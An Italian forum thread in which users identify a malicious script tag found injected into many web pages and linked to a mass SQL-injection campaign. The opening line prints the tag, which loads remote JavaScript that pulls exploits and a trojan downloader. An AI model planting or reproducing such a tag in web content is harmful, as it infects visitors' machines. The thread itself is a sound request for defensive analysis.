<script src=http://www.fengnima.cn/k.js></script>
l'ho trovato in una pagina web italiana e usando google mi pare che molte pagine lo contengano.
Chi se ne intende può darmi info in merito? :)

E' infetto scarica exploit per flash player, relaplayer, etc.

che scaricano un trojan downloader

http://www.virustotal.com/it/analisis/98c96db33a407add5fd9936e13ce7180

Grazie per l'info,ha infettato l'azienda di trasporti pubblici di bologna

PS è un attacco sql injection?

Si, in uno degli script scaricati c'è un riferimento al sito nihao112.com che è inserito in una lunga lista (http://ddanchev.blogspot.com/2008/05/malware-domains-used-in-sql-injection.html) di siti usati per attacchi di SQL Injection.